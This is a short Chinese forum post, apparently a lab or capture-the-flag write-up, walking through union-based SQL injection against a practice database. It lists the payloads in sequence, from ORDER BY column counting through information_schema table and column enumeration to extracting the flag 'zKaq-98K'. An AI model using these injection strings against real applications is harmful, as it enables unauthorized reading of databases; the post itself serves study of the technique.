论坛首页 > 学习杂记

显错注入(1)

adminyg   ·   发表于 2022-05-16 10:32:45   ·   学习杂记

通过order by 3#可以得出此数据库的字段数为3

通过union select 1,2,3#可以得出回显处为3处

通过union select 1,2,database()#可以得出库名为error

通过union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=’error’#可以得出表名为erroe_flag和user

通过 union select 1,2,group_concat(column_name) from information_schema.columns where table_name=’error_flag’#可以得出列名为id,flag

最后通过从表中查询列可以得出flag union select 1,id,flag from error_flag

flag:zKaq-98K

打赏我,让我更有动力~

0 条回复   |  直到 2022-5-17 | 645 次浏览
登录后才可发表内容
返回顶部 投诉反馈

© 2016 - 2024 掌控者 All Rights Reserved.